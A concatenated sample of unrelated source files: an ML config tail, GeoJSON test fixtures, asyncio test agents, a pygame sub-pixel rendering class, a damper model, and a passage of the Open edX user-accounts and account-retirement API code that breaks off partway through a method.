optimizer_config = dict(grad_clip=dict(max_norm=40, norm_type=2))
# learning policy: step decay at 1/3 and 2/3 of training.
lr_config = dict(
    policy='step',
    step=[100, 200]
)
checkpoint_config = dict(interval=1, max_keep_ckpts=1, create_symlink=False)
workflow = [('train', 1)]
log_config = dict(
    interval=10,
    hooks=[
        dict(type='TextLoggerHook'),
        dict(type='TensorboardLoggerHook'),
    ]
)
| StarcoderdataPython |
3227266 | <filename>stac_api_validator/geometries.py
# Example GeoJSON geometry objects (one of each type defined by RFC 7946,
# Appendix A), used as fixtures for exercising STAC API geometry queries.
# Coordinates are [longitude, latitude].

# Single position.
point = {
    "type": "Point",
    "coordinates": [100.0, 0.0]
}

# Two or more connected positions.
linestring = {
    "type": "LineString",
    "coordinates": [
        [100.0, 0.0],
        [101.0, 1.0]
    ]
}

# Single closed ring (first position repeated at the end).
polygon = {
    "type": "Polygon",
    "coordinates": [
        [
            [100.0, 0.0],
            [101.0, 0.0],
            [101.0, 1.0],
            [100.0, 1.0],
            [100.0, 0.0]
        ]
    ]
}

# Exterior ring followed by one interior ring (the hole).
polygon_with_hole = {
    "type": "Polygon",
    "coordinates": [
        [
            [100.0, 0.0],
            [101.0, 0.0],
            [101.0, 1.0],
            [100.0, 1.0],
            [100.0, 0.0]
        ],
        [
            [100.8, 0.8],
            [100.8, 0.2],
            [100.2, 0.2],
            [100.2, 0.8],
            [100.8, 0.8]
        ]
    ]
}

# Collection of positions.
multipoint = {
    "type": "MultiPoint",
    "coordinates": [
        [100.0, 0.0],
        [101.0, 1.0]
    ]
}

# Collection of linestring coordinate arrays.
multilinestring = {
    "type": "MultiLineString",
    "coordinates": [
        [
            [100.0, 0.0],
            [101.0, 1.0]
        ],
        [
            [102.0, 2.0],
            [103.0, 3.0]
        ]
    ]
}

# Collection of polygon coordinate arrays; the second polygon has a hole.
multipolygon = {
    "type": "MultiPolygon",
    "coordinates": [
        [
            [
                [102.0, 2.0],
                [103.0, 2.0],
                [103.0, 3.0],
                [102.0, 3.0],
                [102.0, 2.0]
            ]
        ],
        [
            [
                [100.0, 0.0],
                [101.0, 0.0],
                [101.0, 1.0],
                [100.0, 1.0],
                [100.0, 0.0]
            ],
            [
                [100.2, 0.2],
                [100.2, 0.8],
                [100.8, 0.8],
                [100.8, 0.2],
                [100.2, 0.2]
            ]
        ]
    ]
}

# Heterogeneous collection of geometry objects.
geometry_collection = {
    "type": "GeometryCollection",
    "geometries": [{
        "type": "Point",
        "coordinates": [100.0, 0.0]
    }, {
        "type": "LineString",
        "coordinates": [
            [101.0, 0.0],
            [102.0, 1.0]
        ]
    }]
}
| StarcoderdataPython |
import asyncio
from . import Agent
class StubAgent(Agent):
    """Trivial test agent: always valid, emits exactly one canned event."""

    def is_valid(self):
        # A stub is always considered usable.
        return True

    async def process(self, event_fn):
        # Emit a single fixed metric so callers can assert it was received.
        event_fn(service="test", tags=["test"], metric_f=1.0)
class LaggingAgent(Agent):
    """Test agent that sleeps for ``lag`` seconds before emitting its event.

    Useful for exercising timeout / slow-agent handling in the event loop.
    """

    def __init__(self, cfg, lag):
        # Py3-style super(); the file already uses async/await, so the
        # legacy two-argument form was unnecessary.
        super().__init__(cfg)
        self.lag = lag  # delay in seconds before the event is emitted

    def is_valid(self):
        # Lagging agents are always considered usable.
        return True

    async def process(self, event_fn):
        # Simulate a slow agent, then emit a single canned event.
        await asyncio.sleep(self.lag)
        event_fn(metric_f=1.0,
                 service="lagging_test",
                 tags=["test"])
| StarcoderdataPython |
4817901 | <reponame>duncanhawthorne/coffeeworlds
import pygame
from pygame.locals import *
from math import floor
# Try to import NumPy first and fall back to the legacy Numeric package.
# NumPy is bound to the name `Numeric` so the rest of the module can use a
# single name regardless of which package was found.
try:
    import numpy as Numeric
    # NumPy dtype strings: 1-byte and 4-byte element codes.
    # NOTE(review): "u4" is unsigned while the Numeric fallback uses the
    # signed Int32 — confirm which is intended.
    BYTE = "u1"
    DWORD = "u4"
except ImportError:
    try:
        import Numeric
    except ImportError, e:  # Python 2 'except' syntax; this module is Py2-only
        print "Requires NumPy or Numeric!"
        raise e
    # Numeric's equivalent element-type constants.
    BYTE = Numeric.UnsignedInt8
    DWORD = Numeric.Int32
class SubPixelSurface(object):
    """Pre-renders a pygame surface at several sub-pixel offsets.

    The constructor builds ``x_level * y_level`` copies of *surface*, each
    shifted by a fraction of a pixel and bilinearly filtered, so that
    ``at()`` can return a pre-filtered surface for any fractional
    coordinate without resampling at draw time.
    """

    def __init__(self, surface, x_level=3, y_level=None):
        """Creates a sub pixel surface object.

        surface -- A PyGame surface
        x_level -- Number of sub-pixel levels in x
        y_level -- Number of sub-pixel levels in y (same as x if omitted)
        """
        self.x_level = x_level
        self.y_level = y_level or x_level
        # Pad the source image by one pixel on every side so the shifted
        # bilinear reads in _generate never index out of bounds.
        w, h = surface.get_size()
        ow, oh = w, h
        w += 2
        h += 2
        surf_array_rgb = Numeric.zeros((w, h, 3), BYTE)
        surf_array_rgb[1:ow+1:, 1:oh+1:, ::] = pygame.surfarray.array3d(surface)
        surf_array_a = Numeric.zeros((w, h), BYTE)
        surf_array_a[1:ow+1:, 1:oh+1:] = pygame.surfarray.array_alpha(surface)
        # Replicate the edge rows/columns into the one-pixel border.
        surf_array_rgb[0,::] = surf_array_rgb[1,::]
        surf_array_rgb[::,0] = surf_array_rgb[::,1]
        surf_array_rgb[w-1,::] = surf_array_rgb[w-2,::]
        surf_array_rgb[::,h-1] = surf_array_rgb[::,h-2]
        # Pack RGB + alpha into one 32-bit-per-channel RGBA working array.
        # NOTE(review): the vertical flip here appears to pair with the
        # rotate(270) in _generate to undo surfarray's (x, y) axis order —
        # confirm against pygame.surfarray documentation.
        s = Numeric.zeros(surf_array_rgb.shape[:2]+(4,), DWORD)
        s[::-1, ::, :3] = surf_array_rgb
        s[::-1, ::, 3] = surf_array_a
        # Fractional offsets 0, 1/level, 2/level, ... for each axis.
        x_steps = [float(n) / self.x_level for n in xrange(self.x_level)]
        y_steps = [float(n) / self.y_level for n in xrange(self.y_level)]
        # surfaces[y][x] holds the surface pre-shifted by
        # (x_steps[x], y_steps[y]) of a pixel.
        self.surfaces = []
        for frac_y in y_steps:
            row = []
            self.surfaces.append(row)
            for frac_x in x_steps:
                row.append( SubPixelSurface._generate(s, frac_x, frac_y) )

    @staticmethod
    def _generate(s, frac_x, frac_y):
        """Return a pygame surface shifted by (frac_x, frac_y) of a pixel.

        Implements fixed-point bilinear interpolation: each output pixel is
        a weighted sum of four neighbouring input pixels, with the weights
        scaled by 255 and the sum shifted back down by 8 bits.
        """
        # Axes are swapped (and one fraction mirrored) to match the array
        # layout produced in __init__ — NOTE(review): verify orientation.
        frac_x, frac_y = frac_y, frac_x
        frac_x = 1. - frac_x
        # Fixed-point bilinear weights; they sum to ~255 (truncation aside).
        sa = int( (1.-frac_x) * (1.-frac_y) * 255. )
        sb = int( (1.-frac_x) * frac_y * 255. )
        sc = int( frac_x * (1.-frac_y) * 255. )
        sd = int( (frac_x * frac_y) * 255. )
        # The four one-pixel-shifted views of the padded image.
        a = s[ :-1:, :-1:] * sa
        b = s[ 1::, :-1:] * sb
        c = s[ :-1:, 1:: ] * sc
        d = s[ 1::, 1:: ] * sd
        # Accumulate in place, then divide the fixed-point sum by 256.
        a += b
        a += c
        a += d
        a >>= 8
        rgba_data = a.astype(BYTE).tostring()
        pygame_surface = pygame.image.fromstring(rgba_data, a.shape[:2][::-1], "RGBA")
        # Undo the orientation introduced by the flip in __init__.
        pygame_surface = pygame.transform.rotate(pygame_surface, 270)
        return pygame_surface

    def at(self, x, y):
        """Gets a sub-pixel surface for a given coordinate.

        x -- X coordinate
        y -- Y coordinate
        """
        # Map the fractional part of each coordinate onto the nearest
        # pre-rendered offset level.
        surf_x = int( (x - floor(x)) * self.x_level )
        surf_y = int( (y - floor(y)) * self.y_level )
        return self.surfaces[surf_y][surf_x]
| StarcoderdataPython |
89016 | <reponame>kakemotokeita/dqn-seismic-control<gh_stars>0
class Damper:
    """Stateful damper that remembers the force it applied last step."""

    def __init__(self):
        # Damper force applied at the previous time step.
        self.damper_force0 = 0

    def d_damper_force(self, force, action):
        """Return the change in damper force for this step.

        Args:
            force: force currently acting on the structure.
            action: agent-chosen parameter deciding what proportion of the
                given force the damper pushes back with (sign inverted).

        Returns:
            Difference between the new damper force and the previous one.
        """
        new_force = force * -action
        delta = new_force - self.damper_force0
        self.damper_force0 = new_force
        return delta
"""
An API for retrieving user account information.
For additional information and historical context, see:
https://openedx.atlassian.net/wiki/display/TNL/User+API
"""
import datetime
import logging
import uuid
from functools import wraps
import pytz
from rest_framework.exceptions import UnsupportedMediaType
from consent.models import DataSharingConsent
from django.apps import apps
from django.conf import settings
from django.contrib.auth import authenticate, get_user_model, logout
from django.contrib.sites.models import Site
from django.core.cache import cache
from django.db import transaction
from django.utils.translation import ugettext as _
from edx_ace import ace
from edx_ace.recipient import Recipient
from edx_rest_framework_extensions.auth.jwt.authentication import JwtAuthentication
from edx_rest_framework_extensions.auth.session.authentication import SessionAuthenticationAllowInactiveUser
from enterprise.models import EnterpriseCourseEnrollment, EnterpriseCustomerUser, PendingEnterpriseCustomerUser
from integrated_channels.degreed.models import DegreedLearnerDataTransmissionAudit
from integrated_channels.sap_success_factors.models import SapSuccessFactorsLearnerDataTransmissionAudit
from rest_framework import permissions, status
from rest_framework.authentication import SessionAuthentication
from rest_framework.parsers import JSONParser
from rest_framework.response import Response
from rest_framework.serializers import ValidationError
from rest_framework.views import APIView
from rest_framework.viewsets import ViewSet
from wiki.models import ArticleRevision
from wiki.models.pluginbase import RevisionPluginRevision
from common.djangoapps.entitlements.models import CourseEntitlement
from common.djangoapps.student.models import ( # lint-amnesty, pylint: disable=unused-import
AccountRecovery,
CourseEnrollmentAllowed,
LoginFailures,
ManualEnrollmentAudit,
PendingEmailChange,
PendingNameChange,
Registration,
User,
UserProfile,
get_potentially_retired_user_by_username,
get_retired_email_by_email,
get_retired_username_by_username,
is_username_retired
)
from common.djangoapps.student.models_api import do_name_change_request
from openedx.core.djangoapps.ace_common.template_context import get_base_template_context
from openedx.core.djangoapps.api_admin.models import ApiAccessRequest
from openedx.core.djangoapps.course_groups.models import UnregisteredLearnerCohortAssignments
from openedx.core.djangoapps.credit.models import CreditRequest, CreditRequirementStatus
from openedx.core.djangoapps.external_user_ids.models import ExternalId, ExternalIdType
from openedx.core.djangoapps.lang_pref import LANGUAGE_KEY
from openedx.core.djangoapps.profile_images.images import remove_profile_images
from openedx.core.djangoapps.user_api.accounts.image_helpers import get_profile_image_names, set_has_profile_image
from openedx.core.djangoapps.user_authn.exceptions import AuthFailedError
from openedx.core.lib.api.authentication import BearerAuthenticationAllowInactiveUser
from openedx.core.lib.api.parsers import MergePatchParser
from ..errors import AccountUpdateError, AccountValidationError, UserNotAuthorized, UserNotFound
from ..message_types import DeletionNotificationMessage
from ..models import (
RetirementState,
RetirementStateError,
UserOrgTag,
UserRetirementPartnerReportingStatus,
UserRetirementStatus
)
from .api import get_account_settings, update_account_settings
from .permissions import CanDeactivateUser, CanReplaceUsername, CanRetireUser
from .serializers import (
PendingNameChangeSerializer,
UserRetirementPartnerReportSerializer,
UserRetirementStatusSerializer,
UserSearchEmailSerializer
)
from .signals import USER_RETIRE_LMS_CRITICAL, USER_RETIRE_LMS_MISC, USER_RETIRE_MAILINGS
from .utils import create_retirement_request_and_deactivate_account
try:
from coaching.api import has_ever_consented_to_coaching
except ImportError:
has_ever_consented_to_coaching = None
log = logging.getLogger(__name__)

# Blank/None values written over a user's profile fields during account
# retirement; keys must match the UserProfile PII fields being scrubbed.
USER_PROFILE_PII = {
    'name': '',
    'meta': '',
    'location': '',
    'year_of_birth': None,
    'gender': None,
    'mailing_address': None,
    'city': None,
    'country': None,
    'bio': None,
    'phone_number': None,
}
def request_requires_username(function):
    """
    Requires that a ``username`` key containing a truthy value exists in
    the ``request.data`` attribute of the decorated function.
    """
    @wraps(function)
    def wrapper(self, request):
        """Reject the call with a 404 when no username was supplied."""
        if not request.data.get('username', None):
            return Response(
                status=status.HTTP_404_NOT_FOUND,
                data={'message': 'The user was not specified.'}
            )
        return function(self, request)
    return wrapper
class AccountViewSet(ViewSet):
    """
    **Use Cases**

        Get or update a user's account information. Updates are supported
        only through merge patch.

    **Example Requests**

        GET /api/user/v1/me[?view=shared]
        GET /api/user/v1/accounts?usernames={username1,username2}[?view=shared]
        GET /api/user/v1/accounts?email={user_email}
        GET /api/user/v1/accounts/{username}/[?view=shared]

        PATCH /api/user/v1/accounts/{username}/{"key":"value"} "application/merge-patch+json"

        POST /api/user/v1/accounts/search_emails "application/json"

    **Notes for PATCH requests to /accounts endpoints**

        * Requested updates to social_links are automatically merged with
          previously set links. That is, any newly introduced platforms are
          add to the previous list. Updated links to pre-existing platforms
          replace their values in the previous list. Pre-existing platforms
          can be removed by setting the value of the social_link to an
          empty string ("").

    **Response Values for GET requests to the /me endpoint**
        If the user is not logged in, an HTTP 401 "Not Authorized" response
        is returned.

        Otherwise, an HTTP 200 "OK" response is returned. The response
        contains the following value:

        * username: The username associated with the account.

    **Response Values for GET requests to /accounts endpoints**

        If no user exists with the specified username, or email, an HTTP 404 "Not
        Found" response is returned.

        If the user makes the request for her own account, or makes a
        request for another account and has "is_staff" access, an HTTP 200
        "OK" response is returned. The response contains the following
        values.

        * id: numerical lms user id in db
        * activation_key: auto-generated activation key when signed up via email
        * bio: null or textual representation of user biographical
          information ("about me").
        * country: An ISO 3166 country code or null.
        * date_joined: The date the account was created, in the string
          format provided by datetime. For example, "2014-08-26T17:52:11Z".
        * last_login: The latest date the user logged in, in the string datetime format.
        * email: Email address for the user. New email addresses must be confirmed
          via a confirmation email, so GET does not reflect the change until
          the address has been confirmed.
        * secondary_email: A secondary email address for the user. Unlike
          the email field, GET will reflect the latest update to this field
          even if changes have yet to be confirmed.
        * gender: One of the following values:

            * null
            * "f"
            * "m"
            * "o"

        * goals: The textual representation of the user's goals, or null.
        * is_active: Boolean representation of whether a user is active.
        * language: The user's preferred language, or null.
        * language_proficiencies: Array of language preferences. Each
          preference is a JSON object with the following keys:

            * "code": string ISO 639-1 language code e.g. "en".

        * level_of_education: One of the following values:

            * "p": PhD or Doctorate
            * "m": Master's or professional degree
            * "b": Bachelor's degree
            * "a": Associate's degree
            * "hs": Secondary/high school
            * "jhs": Junior secondary/junior high/middle school
            * "el": Elementary/primary school
            * "none": None
            * "o": Other
            * null: The user did not enter a value

        * mailing_address: The textual representation of the user's mailing
          address, or null.
        * name: The full name of the user.
        * profile_image: A JSON representation of a user's profile image
          information. This representation has the following keys.

            * "has_image": Boolean indicating whether the user has a profile
              image.
            * "image_url_*": Absolute URL to various sizes of a user's
              profile image, where '*' matches a representation of the
              corresponding image size, such as 'small', 'medium', 'large',
              and 'full'. These are configurable via PROFILE_IMAGE_SIZES_MAP.

        * requires_parental_consent: True if the user is a minor
          requiring parental consent.
        * social_links: Array of social links, sorted alphabetically by
          "platform". Each preference is a JSON object with the following keys:

            * "platform": A particular social platform, ex: 'facebook'
            * "social_link": The link to the user's profile on the particular platform

        * username: The username associated with the account.
        * year_of_birth: The year the user was born, as an integer, or null.
        * account_privacy: The user's setting for sharing her personal
          profile. Possible values are "all_users", "private", or "custom".
          If "custom", the user has selectively chosen a subset of shareable
          fields to make visible to others via the User Preferences API.
        * accomplishments_shared: Signals whether badges are enabled on the
          platform and should be fetched.
        * phone_number: The phone number for the user. String of numbers with
          an optional `+` sign at the start.
        * pending_name_change: If the user has an active name change request, returns the
          requested name.
        * is_verified_name_enabled: Temporary flag to control verified name field - see
          https://github.com/edx/edx-name-affirmation/blob/main/edx_name_affirmation/toggles.py

        For all text fields, plain text instead of HTML is supported. The
        data is stored exactly as specified. Clients must HTML escape
        rendered values to avoid script injections.

        If a user who does not have "is_staff" access requests account
        information for a different user, only a subset of these fields is
        returned. The returned fields depend on the
        ACCOUNT_VISIBILITY_CONFIGURATION configuration setting and the
        visibility preference of the user for whom data is requested.

        Note that a user can view which account fields they have shared
        with other users by requesting their own username and providing
        the "view=shared" URL parameter.

    **Response Values for PATCH**

        Users can only modify their own account information. If the
        requesting user does not have the specified username and has staff
        access, the request returns an HTTP 403 "Forbidden" response. If
        the requesting user does not have staff access, the request
        returns an HTTP 404 "Not Found" response to avoid revealing the
        existence of the account.

        If no user exists with the specified username, an HTTP 404 "Not
        Found" response is returned.

        If "application/merge-patch+json" is not the specified content
        type, a 415 "Unsupported Media Type" response is returned.

        If validation errors prevent the update, this method returns a 400
        "Bad Request" response that includes a "field_errors" field that
        lists all error messages.

        If a failure at the time of the update prevents the update, a 400
        "Bad Request" error is returned. The JSON collection contains
        specific errors.

        If the update is successful, updated user account data is returned.
    """
    authentication_classes = (
        JwtAuthentication, BearerAuthenticationAllowInactiveUser, SessionAuthenticationAllowInactiveUser
    )
    permission_classes = (permissions.IsAuthenticated,)
    parser_classes = (JSONParser, MergePatchParser,)

    def get(self, request):
        """
        GET /api/user/v1/me
        """
        return Response({'username': request.user.username})

    def list(self, request):
        """
        GET /api/user/v1/accounts?username={username1,username2}
        GET /api/user/v1/accounts?email={user_email}
        """
        usernames = request.GET.get('username')
        user_email = request.GET.get('email')
        search_usernames = []

        if usernames:
            search_usernames = usernames.strip(',').split(',')
        elif user_email:
            # Bug fix: this previously called ``strip('')``, which strips no
            # characters at all; ``strip()`` trims surrounding whitespace.
            user_email = user_email.strip()
            try:
                user = User.objects.get(email=user_email)
            except (UserNotFound, User.DoesNotExist):
                return Response(status=status.HTTP_404_NOT_FOUND)
            search_usernames = [user.username]
        try:
            account_settings = get_account_settings(
                request, search_usernames, view=request.query_params.get('view'))
        except UserNotFound:
            return Response(status=status.HTTP_404_NOT_FOUND)

        return Response(account_settings)

    def search_emails(self, request):
        """
        POST /api/user/v1/accounts/search_emails
        Content Type: "application/json"
        {
            "emails": ["<EMAIL>", "<EMAIL>"]
        }
        Response:
        [
            {
                "username": "edx",
                "email": "<EMAIL>",
                "id": 3,
            },
            {
                "username": "staff",
                "email": "<EMAIL>",
                "id": 8,
            }
        ]
        """
        # Respond 404 (not 403) to non-staff callers to avoid revealing that
        # this endpoint exists.
        if not request.user.is_staff:
            return Response(
                {
                    'developer_message': 'not_found',
                    'user_message': 'Not Found'
                },
                status=status.HTTP_404_NOT_FOUND
            )

        try:
            user_emails = request.data['emails']
        except KeyError as error:
            error_message = f'{error} field is required'
            return Response(
                {
                    'developer_message': error_message,
                    'user_message': error_message
                },
                status=status.HTTP_400_BAD_REQUEST
            )
        users = User.objects.filter(email__in=user_emails)
        data = UserSearchEmailSerializer(users, many=True).data
        return Response(data)

    def retrieve(self, request, username):
        """
        GET /api/user/v1/accounts/{username}/
        """
        try:
            account_settings = get_account_settings(
                request, [username], view=request.query_params.get('view'))
        except UserNotFound:
            return Response(status=status.HTTP_404_NOT_FOUND)

        return Response(account_settings[0])

    def partial_update(self, request, username):
        """
        PATCH /api/user/v1/accounts/{username}/

        Note that this implementation is the "merge patch" implementation proposed in
        https://tools.ietf.org/html/rfc7396. The content_type must be "application/merge-patch+json" or
        else an error response with status code 415 will be returned.
        """
        if request.content_type != MergePatchParser.media_type:
            raise UnsupportedMediaType(request.content_type)

        try:
            with transaction.atomic():
                update_account_settings(request.user, request.data, username=username)
                account_settings = get_account_settings(request, [username])[0]
        except UserNotAuthorized:
            return Response(status=status.HTTP_403_FORBIDDEN)
        except UserNotFound:
            return Response(status=status.HTTP_404_NOT_FOUND)
        except AccountValidationError as err:
            return Response({"field_errors": err.field_errors}, status=status.HTTP_400_BAD_REQUEST)
        except AccountUpdateError as err:
            return Response(
                {
                    "developer_message": err.developer_message,
                    "user_message": err.user_message
                },
                status=status.HTTP_400_BAD_REQUEST
            )

        return Response(account_settings)
class NameChangeView(APIView):
    """
    Request a profile name change. This creates a PendingNameChange to be verified later,
    rather than updating the user's profile name directly.
    """
    authentication_classes = (JwtAuthentication, SessionAuthentication,)
    permission_classes = (permissions.IsAuthenticated,)

    def post(self, request):
        """
        POST /api/user/v1/accounts/name_change/

        Example request:
            {
                "name": "<NAME>"
            }
        """
        requesting_user = request.user
        new_name = request.data.get('name', None)
        rationale = f'Name change requested through account API by {requesting_user.username}'

        serializer = PendingNameChangeSerializer(data={'new_name': new_name})

        # Guard clause: invalid names are rejected before any request is created.
        if not serializer.is_valid():
            return Response(status=status.HTTP_400_BAD_REQUEST, data=serializer.errors)

        pending_name_change = do_name_change_request(requesting_user, new_name, rationale)[0]
        if pending_name_change:
            return Response(status=status.HTTP_201_CREATED)
        return Response(
            'The name given was identical to the current name.',
            status=status.HTTP_400_BAD_REQUEST
        )
class AccountDeactivationView(APIView):
    """
    Account deactivation viewset. Currently only supports POST requests.
    Only admins can deactivate accounts.
    """
    authentication_classes = (JwtAuthentication, )
    permission_classes = (permissions.IsAuthenticated, CanDeactivateUser)

    def post(self, request, username):
        """
        POST /api/user/v1/accounts/{username}/deactivate/

        Marks the user as having no password set for deactivation purposes,
        then returns the (now deactivated) account settings.
        """
        target_user = User.objects.get(username=username)
        _set_unusable_password(target_user)
        return Response(get_account_settings(request, [username])[0])
class DeactivateLogoutView(APIView):
    """
    POST /api/user/v1/accounts/deactivate_logout/
    {
        "password": "<PASSWORD>",
    }

    **POST Parameters**

      A POST request must include the following parameter.

      * password: Required. The current password of the user being deactivated.

    **POST Response Values**

     If the request does not specify a username or submits a username
     for a non-existent user, the request returns an HTTP 404 "Not Found"
     response.

     If a user who is not a superuser tries to deactivate a user,
     the request returns an HTTP 403 "Forbidden" response.

     If the specified user is successfully deactivated, the request
     returns an HTTP 204 "No Content" response.

     If an unanticipated error occurs, the request returns an
     HTTP 500 "Internal Server Error" response.

    Allows an LMS user to take the following actions:
    -  Change the user's password permanently to Django's unusable password
    -  Log the user out
    - Create a row in the retirement table for that user
    """
    authentication_classes = (JwtAuthentication, SessionAuthentication, )
    permission_classes = (permissions.IsAuthenticated, )

    def post(self, request):
        """
        POST /api/user/v1/accounts/deactivate_logout/

        Marks the user as having no password set for deactivation purposes,
        and logs the user out.
        """
        user_model = get_user_model()
        try:
            # Re-authenticate with the submitted password before a destructive
            # account action; any non-204 response is passed straight through.
            verify_user_password_response = self._verify_user_password(request)
            if verify_user_password_response.status_code != status.HTTP_204_NO_CONTENT:
                return verify_user_password_response
            with transaction.atomic():
                # Capture the email address before retirement scrubs it from
                # the user record — it is needed for the notification below.
                user_email = request.user.email
                create_retirement_request_and_deactivate_account(request.user)

                try:
                    # Send notification email to user
                    site = Site.objects.get_current()
                    notification_context = get_base_template_context(site)
                    notification_context.update({'full_name': request.user.profile.name})
                    language_code = request.user.preferences.model.get_value(
                        request.user,
                        LANGUAGE_KEY,
                        default=settings.LANGUAGE_CODE
                    )
                    notification = DeletionNotificationMessage().personalize(
                        recipient=Recipient(lms_user_id=0, email_address=user_email),
                        language=language_code,
                        user_context=notification_context,
                    )
                    ace.send(notification)
                except Exception as exc:
                    # Re-raising aborts the atomic block, so a failed email
                    # rolls back the retirement request as well.
                    log.exception('Error sending out deletion notification email')
                    raise

            # Log the user out.
            logout(request)
            return Response(status=status.HTTP_204_NO_CONTENT)
        except KeyError:
            log.exception(f'Username not specified {request.user}')
            return Response('Username not specified.', status=status.HTTP_404_NOT_FOUND)
        except user_model.DoesNotExist:
            log.exception(f'The user "{request.user.username}" does not exist.')
            return Response(
                f'The user "{request.user.username}" does not exist.', status=status.HTTP_404_NOT_FOUND
            )
        except Exception as exc:  # pylint: disable=broad-except
            # Catch-all boundary: anything unexpected becomes a 500 with the
            # error text in the body.
            log.exception(f'500 error deactivating account {exc}')
            return Response(str(exc), status=status.HTTP_500_INTERNAL_SERVER_ERROR)

    def _verify_user_password(self, request):
        """
        If the user is logged in and we want to verify that they have submitted the correct password
        for a major account change (for example, retiring this user's account).

        Args:
            request (HttpRequest): A request object where the password should be included in the POST fields.
        """
        try:
            # Honor the account-lockout feature before even attempting auth.
            self._check_excessive_login_attempts(request.user)
            user = authenticate(username=request.user.username, password=request.POST['password'], request=request)
            if user:
                # Successful check resets the failure counter.
                if LoginFailures.is_feature_enabled():
                    LoginFailures.clear_lockout_counter(user)
                return Response(status=status.HTTP_204_NO_CONTENT)
            else:
                self._handle_failed_authentication(request.user)
        except AuthFailedError as err:
            log.exception(
                f"The user password to deactivate was incorrect. {request.user.username}"
            )
            return Response(str(err), status=status.HTTP_403_FORBIDDEN)
        except Exception as err:  # pylint: disable=broad-except
            return Response(f"Could not verify user password: {err}", status=status.HTTP_400_BAD_REQUEST)

    def _check_excessive_login_attempts(self, user):
        """
        See if account has been locked out due to excessive login failures
        """
        if user and LoginFailures.is_feature_enabled():
            if LoginFailures.is_user_locked_out(user):
                raise AuthFailedError(_('This account has been temporarily locked due '
                                        'to excessive login failures. Try again later.'))

    def _handle_failed_authentication(self, user):
        """
        Handles updating the failed login count, inactive user notifications, and logging failed authentications.
        """
        if user and LoginFailures.is_feature_enabled():
            LoginFailures.increment_lockout_counter(user)

        raise AuthFailedError(_('Email or password is incorrect.'))
def _set_unusable_password(user):
"""
Helper method for the shared functionality of setting a user's
password to the unusable password, thus deactivating the account.
"""
user.set_unusable_password()
user.save()
class AccountRetirementPartnerReportView(ViewSet):
"""
Provides API endpoints for managing partner reporting of retired
users.
"""
DELETION_COMPLETED_KEY = 'deletion_completed'
ORGS_CONFIG_KEY = 'orgs_config'
ORGS_CONFIG_ORG_KEY = 'org'
ORGS_CONFIG_FIELD_HEADINGS_KEY = 'field_headings'
ORIGINAL_EMAIL_KEY = 'original_email'
ORIGINAL_NAME_KEY = 'original_name'
STUDENT_ID_KEY = 'student_id'
authentication_classes = (JwtAuthentication,)
permission_classes = (permissions.IsAuthenticated, CanRetireUser,)
parser_classes = (JSONParser,)
serializer_class = UserRetirementStatusSerializer
@staticmethod
def _get_orgs_for_user(user):
"""
Returns a set of orgs that the user has enrollments with
"""
orgs = set()
for enrollment in user.courseenrollment_set.all():
org = enrollment.course_id.org
# Org can conceivably be blank or this bogus default value
if org and org != 'outdated_entry':
orgs.add(org)
try:
# if the user has ever launched a managed Zoom xblock,
# we'll notify Zoom to delete their records.
if user.launchlog_set.filter(managed=True).count():
orgs.add('zoom')
except AttributeError:
# Zoom XBlock not installed
pass
return orgs
def retirement_partner_report(self, request): # pylint: disable=unused-argument
"""
POST /api/user/v1/accounts/retirement_partner_report/
Returns the list of UserRetirementPartnerReportingStatus users
that are not already being processed and updates their status
to indicate they are currently being processed.
"""
retirement_statuses = UserRetirementPartnerReportingStatus.objects.filter(
is_being_processed=False
).order_by('id')
retirements = []
for retirement_status in retirement_statuses:
retirements.append(self._get_retirement_for_partner_report(retirement_status))
serializer = UserRetirementPartnerReportSerializer(retirements, many=True)
retirement_statuses.update(is_being_processed=True)
return Response(serializer.data)
def _get_retirement_for_partner_report(self, retirement_status):
"""
Get the retirement for this retirement_status. The retirement info will be included in the partner report.
"""
retirement = {
'user_id': retirement_status.user.pk,
'original_username': retirement_status.original_username,
AccountRetirementPartnerReportView.ORIGINAL_EMAIL_KEY: retirement_status.original_email,
AccountRetirementPartnerReportView.ORIGINAL_NAME_KEY: retirement_status.original_name,
'orgs': self._get_orgs_for_user(retirement_status.user),
'created': retirement_status.created,
}
# Some orgs have a custom list of headings and content for the partner report. Add this, if applicable.
self._add_orgs_config_for_user(retirement, retirement_status.user)
return retirement
def _add_orgs_config_for_user(self, retirement, user):
"""
Check to see if the user's info was sent to any partners (orgs) that have a a custom list of headings and
content for the partner report. If so, add this.
"""
# See if the MicroBachelors coaching provider needs to be notified of this user's retirement
if has_ever_consented_to_coaching is not None and has_ever_consented_to_coaching(user):
# See if the user has a MicroBachelors external id. If not, they were never sent to the
# coaching provider.
external_ids = ExternalId.objects.filter(
user=user,
external_id_type__name=ExternalIdType.MICROBACHELORS_COACHING
)
if external_ids.exists():
# User has an external id. Add the additional info.
external_id = str(external_ids[0].external_user_id)
self._add_coaching_orgs_config(retirement, external_id)
def _add_coaching_orgs_config(self, retirement, external_id):
"""
Add the orgs configuration for MicroBachelors coaching
"""
# Add the custom field headings
retirement[AccountRetirementPartnerReportView.ORGS_CONFIG_KEY] = [
{
AccountRetirementPartnerReportView.ORGS_CONFIG_ORG_KEY: 'mb_coaching',
AccountRetirementPartnerReportView.ORGS_CONFIG_FIELD_HEADINGS_KEY: [
AccountRetirementPartnerReportView.STUDENT_ID_KEY,
AccountRetirementPartnerReportView.ORIGINAL_EMAIL_KEY,
AccountRetirementPartnerReportView.ORIGINAL_NAME_KEY,
AccountRetirementPartnerReportView.DELETION_COMPLETED_KEY
]
}
]
# Add the custom field value
retirement[AccountRetirementPartnerReportView.STUDENT_ID_KEY] = external_id
    @request_requires_username
    def retirement_partner_status_create(self, request):
        """
        PUT /api/user/v1/accounts/retirement_partner_report/
        ```
        {
            'username': 'user_to_retire'
        }
        ```
        Creates a UserRetirementPartnerReportingStatus object for the given user
        as part of the retirement pipeline.
        """
        username = request.data['username']
        try:
            retirement = UserRetirementStatus.get_retirement_for_retirement_action(username)
            orgs = self._get_orgs_for_user(retirement.user)
            # Only record a partner-reporting row when at least one org needs the report.
            if orgs:
                # get_or_create keyed on the user makes repeated PUTs idempotent.
                UserRetirementPartnerReportingStatus.objects.get_or_create(
                    user=retirement.user,
                    defaults={
                        'original_username': retirement.original_username,
                        'original_email': retirement.original_email,
                        'original_name': retirement.original_name
                    }
                )
            return Response(status=status.HTTP_204_NO_CONTENT)
        except UserRetirementStatus.DoesNotExist:
            # No retirement in progress for this username.
            return Response(status=status.HTTP_404_NOT_FOUND)
    def retirement_partner_cleanup(self, request):
        """
        POST /api/user/v1/accounts/retirement_partner_report_cleanup/
        [{'original_username': 'user1'}, {'original_username': 'user2'}, ...]
